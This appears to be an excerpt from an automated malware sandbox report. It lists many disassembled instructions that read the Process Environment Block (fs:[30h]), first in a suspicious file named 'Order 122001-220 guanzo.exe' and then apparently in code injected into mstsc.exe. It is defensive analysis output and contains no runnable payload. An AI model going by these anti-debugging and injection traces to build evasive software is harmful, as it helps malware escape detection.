          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01907D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01923D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01963540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01963884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01963884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01900050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01900050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01913B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01913B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01928EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01903A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01918E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01924A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01924A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01974257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]
